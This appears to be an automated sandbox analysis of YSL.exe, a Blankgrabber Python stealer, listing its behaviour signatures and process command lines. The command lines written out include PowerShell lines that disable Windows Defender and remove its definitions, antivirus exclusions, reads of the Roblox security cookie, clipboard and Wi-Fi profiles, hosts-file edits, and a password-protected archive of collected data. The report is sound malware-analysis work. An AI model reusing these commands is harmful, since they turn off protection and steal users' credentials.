Analysis Overview
SHA256
83f5a2f68b73babb2f3b9c137294b41ae8280dbaf2a75cceb42999f375879f00
Threat Level: Known bad
The file YSL.exe was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Clipboard Data
Executes dropped EXE
Unsecured Credentials: Credentials In Files
Loads dropped DLL
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Obfuscated Files or Information: Command Obfuscation
Legitimate hosting services abused for malware hosting/C2
Enumerates processes with tasklist
Hide Artifacts: Hidden Files and Directories
UPX packed file
Drops file in Windows directory
Event Triggered Execution: Netsh Helper DLL
Browser Information Discovery
Enumerates physical storage devices
Unsigned PE
System Network Configuration Discovery: Wi-Fi Discovery
Modifies data under HKEY_USERS
Detects videocard installed
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Gathers system information
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-07 21:48
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-07 21:48
Reported
2024-11-07 21:58
Platform
win11-20241007-de
Max time kernel
600s
Max time network
604s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI37922\rar.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Windows\INF\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133754897460509974" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\YSL.exe
"C:\Users\Admin\AppData\Local\Temp\YSL.exe"
C:\Users\Admin\AppData\Local\Temp\YSL.exe
"C:\Users\Admin\AppData\Local\Temp\YSL.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\YSL.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Fatal Error', 0, 'Fatal Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\YSL.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Fatal Error', 0, 'Fatal Error', 0+16);close()"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\YSL.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\YSL.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2nw24s4m\2nw24s4m.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF83.tmp" "c:\Users\Admin\AppData\Local\Temp\2nw24s4m\CSCA0E8358D17E44728FC69D24612FBFB4.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI37922\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\SHiPp.zip" *"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\_MEI37922\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI37922\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\SHiPp.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffb1f54cc40,0x7ffb1f54cc4c,0x7ffb1f54cc58
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1928 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1700,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2412 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
